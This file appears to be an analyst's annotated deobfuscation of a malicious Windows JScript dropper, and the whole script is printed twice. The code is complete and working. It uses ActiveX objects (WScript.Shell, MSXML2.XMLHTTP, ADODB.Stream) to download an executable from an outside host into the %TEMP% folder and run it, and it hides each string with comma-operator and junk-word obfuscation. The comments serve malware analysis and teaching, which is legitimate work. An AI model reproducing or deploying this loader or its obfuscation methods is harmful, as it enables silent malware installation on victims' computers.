/malicious_snippet.js

## malicious_snippet.js
// The first line doesn't look good, but after looking through the entire script, we can see that it's just random snippets from the jQuery source code
// I have removed all the subsequent smokescreens for brevity
iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
// Sets an index
fergusI = 0;
// Creates a function that returns the first character of anystring
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// Whenever you have ("collection", "of", "strings") inside parathesis like this, the last string is always returned
// so the first group of ("characteristically","major","n") returns "n"
// This line equates to:
/*
["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
*/
var uUXTro = [("characteristically","major","n")+"hh"+("notebook","orion","transitory","verizon","lH")+"CNAl", "A"+"iR"+"Nh"+("seventyfour","morose","respond","cD")+"nBHy", "E"+"xpan"+("verse","elevation","plowing","corinth","dEnviron")+"me"+"nt"+"Stri"+("worshipper","gibbet","ngs"), ("turin","trite","rules","decorative","")+"%"+("wetted","picture","TE")+"MP%", ""+("charged","flapping","flexibility",".")+"exe", ("arbiter","sediment","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("accent","cheap","vi")+("accessible","hydraulic","debut","passim","nc")+"enti"+"ve"+"eXincentiv"+("fiscal","micah","preamble","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("episodes","perceived","dispel","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("elated","falstaff","S"), "AmvHaUzPHrP", ("michigan","fatalism","brokendown","puerto","h")+"in"+"ce"+("convulsive","narrow","reporter","nt")+"iv"+"ee"+("deaths","eaves","disapproval","li")+"nc"+("sedative","remission","en")+"ti"+("woods","launch","modems","knitting","vel"), "UJcMlBfkOA", "G"+("humanitarian","straighten","priscilla","rRAF")+"Ka"+("britannica","doggerel","abasement","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("deposit","sardinia","clime","Xi")+"nc"+"en"+("considerations","bruges","respondent","unconcern","ti")+"ve"+("unforgettable","ridley","priest","ML")+"in"+"ce"+("quinine","contrasting","nt")+("programming","satisfaction","iv")+"e2" + "."+"in"+"ce"+("inferno","neighborhood","andale","notation","nt")+("forsooth","birds","toronto","iv")+"eXMi"+"ncenti"+("decomposition","speciality","introspection","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
// Creates a string for setting a regular expression inside JQuery to a variable called rneedsContext
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
// Remove "sFtalU", "FlAYMT" from the uUXTro array
uUXTro.splice(7, fergusI + 2);
// Removes the string "inventive" from the 7th item in uUXTro and assigns that to the variable `chubby` resulting in:
// chubby = ActiveXObject
chubby = uUXTro[1+4+1].split("incentive").join("");
// Set the variable lrAXrUK to this['ActiveXObject'] which in the case of running in the global context would be the same as window.ActiveXObject
var lrAXrUK = this[chubby];
// Gibberish, never used
AapDxox = "IdauNqhuT";
// Using the above methods and created functions assigns the variable `societies` to the character "p"
societies = (("discharging", "bigger", "HiLPFi", "naive", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
// Does the same for assigning the variable `theoriess` to the character "s"
theoriess = (("jordan", "hemlock", "ziHwqRxJu", "irrigation", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

// Sets the above used index value to 6
fergusI = 6;
// Assigns the 8th position of the uUXTro array to: "WScincentiveriptincentive.Shincentiveelincentivel"
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
// Assigns the 9th position of the uUXTro array to "EuHNTOs"
uUXTro[fergusI + 2] = "EuHNTOs";
// Increases the index to 7
fergusI++;
// Removes the 8th index to the 4th last index of the uUXTro array resulting in:
/*
["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "WScincentiveriptincentive.Shincentiveelincentivel", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
*/
uUXTro.splice(fergusI + 1, fergusI - 4);
// Removes the string "inventive" from the 7th item in uUXTro resulting in:
// uUXTro[7] = "WScript.Shell"
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
// Attempts to create a new lrAXrUK (or this[chubby] or window.ActiveXObject)
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
// Increases the index to 8
fergusI++;
// Again removes the "incentive" string from position 8 resulting in:
// "uUXTro[9] = MSXML2.XMLHTTP"
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
// Attemps to create a new window.ActiveXObject(MWXML2.XMLHTTP)
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
// Sets the index to 4
fergusI /= 2;
// Attempts to call window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
// Sets the variable `revealede` to the character "E"
revealede = (("potion", "instruments", "eYyeHhl", "emanuel", "EbYlGrsShJg") + "qWuYEw").contradistinction();
// Declares a function called `undeveloped` that accepts 2 parameters
// This function is only called once, so I will be replacing the variables with their passed in values
function undeveloped(poseidon, economic) {

    try {
        // Using our previous defined BPmnOej of window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)
        // Assigns the `jersey` variable with the value of window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe
        var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];

        // window.ActiveXObject(MWXML2.XMLHTTP).opEn(GET, "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", false)
        zBqJutIT["o" + societies + revealede + "n"](("dumfounded","reload","ratios","corollary","G") + revealede + ("uniform","desirable","cucumber","months","T"), poseidon, false);

        // window.ActiveXObject(MWXML2.XMLHTTP).send()
        zBqJutIT[theoriess + ("practice","graduates","e") + (("tunes", "deferred", "vQJtIpP", "essayist", "sequence", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("christians", "inane", "CEdBvsmD", "aborigines", "disputes", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();

        // if window.ActiveXObject(MWXML2.XMLHTTP).status == 200
        if (zBqJutIT.status == 200) {
            // Assigns PbOLTH to window.ActiveXObject("ADODB.Stream")
            var PbOLTH = new lrAXrUK((""+("expence","risky","A")+"pO"+("honduras","fastest","garter","everywhere","DB.") + ""+"S"+("parking","betty","acceded","tr")+"eam").replace("p", "D"));
            // window.ActiveXObject("ADODB.Stream").open()
            PbOLTH.open();

            // window.ActiveXObject("ADODB.Stream").type = 1;
            PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);

            // window.ActiveXObject("ADODB.Stream").write(window.ActiveXObject(MWXML2.XMLHTTP).ResponseBody)
            PbOLTH[("wellworn","wesley","tenderfoot","crane","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("considerations","overpower","bukkake","warcraft","pon") + theoriess + "e"+"Bo"+("canal","dunce","dy")]);

            // window.ActiveXObject("ADODB.Stream").position = 0;
            PbOLTH[(societies + "o"+"Di"+("unearthly","intoxicate","embedded","theater","ti")+"on").replace("D", theoriess)] = 0;

            // window.ActiveXObject("ADODB.Stream").saveToFile("window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe", 2);
            PbOLTH["sav"+"eT"+"oF"+("reform","mastercard","constraint","patrol","ile")](jersey, 2);

            // window.ActiveXObject("ADODB.Stream").close();
            PbOLTH.close();

            // window.ActiveXObject.run("window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe", 1, false);
            OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
        }

    } catch (HiQurqnDJ) { };

}
// Calls the `undeveloped` function with the following values: "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", "yROdkAds"
undeveloped("http:"+("morose","integration","liberty","upload","//")+("benefits","boards","cyber","th")+"em"+"e4"+("thereof","adaptation","invitations","bloggers","5.")+("unremitting","reminder","ultrac")+("legislation","vacations","finishing","om")+("milky","parking","outsider","jeffrey",".c")+"o.in/s"+("hubbub","fetter","ys")+"te"+"m/lo"+("skating","inflammatory","wring","reports","gs/98h")+"7b"+("surrey","edification","trepidation","66")+"gb.exe","yROdkAds");
	// The first line doesn't look good, but after looking through the entire script, we can see that it's just random snippets from the jQuery source code
	// I have removed all the subsequent smokescreens for brevity
	iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
	// Sets an index
	fergusI = 0;
	// Creates a function that returns the first character of anystring
	String.prototype.contradistinction = function () { return this.substr(0, 1); };
	// Whenever you have ("collection", "of", "strings") inside parathesis like this, the last string is always returned
	// so the first group of ("characteristically","major","n") returns "n"
	// This line equates to:
	/*
	["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
	*/
	var uUXTro = [("characteristically","major","n")+"hh"+("notebook","orion","transitory","verizon","lH")+"CNAl", "A"+"iR"+"Nh"+("seventyfour","morose","respond","cD")+"nBHy", "E"+"xpan"+("verse","elevation","plowing","corinth","dEnviron")+"me"+"nt"+"Stri"+("worshipper","gibbet","ngs"), ("turin","trite","rules","decorative","")+"%"+("wetted","picture","TE")+"MP%", ""+("charged","flapping","flexibility",".")+"exe", ("arbiter","sediment","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("accent","cheap","vi")+("accessible","hydraulic","debut","passim","nc")+"enti"+"ve"+"eXincentiv"+("fiscal","micah","preamble","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("episodes","perceived","dispel","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("elated","falstaff","S"), "AmvHaUzPHrP", ("michigan","fatalism","brokendown","puerto","h")+"in"+"ce"+("convulsive","narrow","reporter","nt")+"iv"+"ee"+("deaths","eaves","disapproval","li")+"nc"+("sedative","remission","en")+"ti"+("woods","launch","modems","knitting","vel"), "UJcMlBfkOA", "G"+("humanitarian","straighten","priscilla","rRAF")+"Ka"+("britannica","doggerel","abasement","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("deposit","sardinia","clime","Xi")+"nc"+"en"+("considerations","bruges","respondent","unconcern","ti")+"ve"+("unforgettable","ridley","priest","ML")+"in"+"ce"+("quinine","contrasting","nt")+("programming","satisfaction","iv")+"e2" + "."+"in"+"ce"+("inferno","neighborhood","andale","notation","nt")+("forsooth","birds","toronto","iv")+"eXMi"+"ncenti"+("decomposition","speciality","introspection","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
	// Creates a string for setting a regular expression inside JQuery to a variable called rneedsContext
	rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
	// Remove "sFtalU", "FlAYMT" from the uUXTro array
	uUXTro.splice(7, fergusI + 2);
	// Removes the string "inventive" from the 7th item in uUXTro and assigns that to the variable `chubby` resulting in:
	// chubby = ActiveXObject
	chubby = uUXTro[1+4+1].split("incentive").join("");
	// Set the variable lrAXrUK to this['ActiveXObject'] which in the case of running in the global context would be the same as window.ActiveXObject
	var lrAXrUK = this[chubby];
	// Gibberish, never used
	AapDxox = "IdauNqhuT";
	// Using the above methods and created functions assigns the variable `societies` to the character "p"
	societies = (("discharging", "bigger", "HiLPFi", "naive", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
	// Does the same for assigning the variable `theoriess` to the character "s"
	theoriess = (("jordan", "hemlock", "ziHwqRxJu", "irrigation", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

	// Sets the above used index value to 6
	fergusI = 6;
	// Assigns the 8th position of the uUXTro array to: "WScincentiveriptincentive.Shincentiveelincentivel"
	uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
	// Assigns the 9th position of the uUXTro array to "EuHNTOs"
	uUXTro[fergusI + 2] = "EuHNTOs";
	// Increases the index to 7
	fergusI++;
	// Removes the 8th index to the 4th last index of the uUXTro array resulting in:
	/*
	["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "WScincentiveriptincentive.Shincentiveelincentivel", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
	*/
	uUXTro.splice(fergusI + 1, fergusI - 4);
	// Removes the string "inventive" from the 7th item in uUXTro resulting in:
	// uUXTro[7] = "WScript.Shell"
	uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
	// Attempts to create a new lrAXrUK (or this[chubby] or window.ActiveXObject)
	var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
	// Increases the index to 8
	fergusI++;
	// Again removes the "incentive" string from position 8 resulting in:
	// "uUXTro[9] = MSXML2.XMLHTTP"
	uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
	// Attemps to create a new window.ActiveXObject(MWXML2.XMLHTTP)
	var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
	// Sets the index to 4
	fergusI /= 2;
	// Attempts to call window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)
	var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
	// Sets the variable `revealede` to the character "E"
	revealede = (("potion", "instruments", "eYyeHhl", "emanuel", "EbYlGrsShJg") + "qWuYEw").contradistinction();
	// Declares a function called `undeveloped` that accepts 2 parameters
	// This function is only called once, so I will be replacing the variables with their passed in values
	function undeveloped(poseidon, economic) {

	try {
	// Using our previous defined BPmnOej of window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)
	// Assigns the `jersey` variable with the value of window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe
	var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];

	// window.ActiveXObject(MWXML2.XMLHTTP).opEn(GET, "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", false)
	zBqJutIT["o" + societies + revealede + "n"](("dumfounded","reload","ratios","corollary","G") + revealede + ("uniform","desirable","cucumber","months","T"), poseidon, false);

	// window.ActiveXObject(MWXML2.XMLHTTP).send()
	zBqJutIT[theoriess + ("practice","graduates","e") + (("tunes", "deferred", "vQJtIpP", "essayist", "sequence", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("christians", "inane", "CEdBvsmD", "aborigines", "disputes", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();

	// if window.ActiveXObject(MWXML2.XMLHTTP).status == 200
	if (zBqJutIT.status == 200) {
	// Assigns PbOLTH to window.ActiveXObject("ADODB.Stream")
	var PbOLTH = new lrAXrUK((""+("expence","risky","A")+"pO"+("honduras","fastest","garter","everywhere","DB.") + ""+"S"+("parking","betty","acceded","tr")+"eam").replace("p", "D"));
	// window.ActiveXObject("ADODB.Stream").open()
	PbOLTH.open();

	// window.ActiveXObject("ADODB.Stream").type = 1;
	PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);

	// window.ActiveXObject("ADODB.Stream").write(window.ActiveXObject(MWXML2.XMLHTTP).ResponseBody)
	PbOLTH[("wellworn","wesley","tenderfoot","crane","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("considerations","overpower","bukkake","warcraft","pon") + theoriess + "e"+"Bo"+("canal","dunce","dy")]);

	// window.ActiveXObject("ADODB.Stream").position = 0;
	PbOLTH[(societies + "o"+"Di"+("unearthly","intoxicate","embedded","theater","ti")+"on").replace("D", theoriess)] = 0;

	// window.ActiveXObject("ADODB.Stream").saveToFile("window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe", 2);
	PbOLTH["sav"+"eT"+"oF"+("reform","mastercard","constraint","patrol","ile")](jersey, 2);

	// window.ActiveXObject("ADODB.Stream").close();
	PbOLTH.close();

	// window.ActiveXObject.run("window.ActiveXObject.ExpandEnvironmentStrings(%TEMP%)/yROdkAds.exe", 1, false);
	OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
	}

	} catch (HiQurqnDJ) { };

	}
	// Calls the `undeveloped` function with the following values: "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", "yROdkAds"
	undeveloped("http:"+("morose","integration","liberty","upload","//")+("benefits","boards","cyber","th")+"em"+"e4"+("thereof","adaptation","invitations","bloggers","5.")+("unremitting","reminder","ultrac")+("legislation","vacations","finishing","om")+("milky","parking","outsider","jeffrey",".c")+"o.in/s"+("hubbub","fetter","ys")+"te"+"m/lo"+("skating","inflammatory","wring","reports","gs/98h")+"7b"+("surrey","edification","trepidation","66")+"gb.exe","yROdkAds");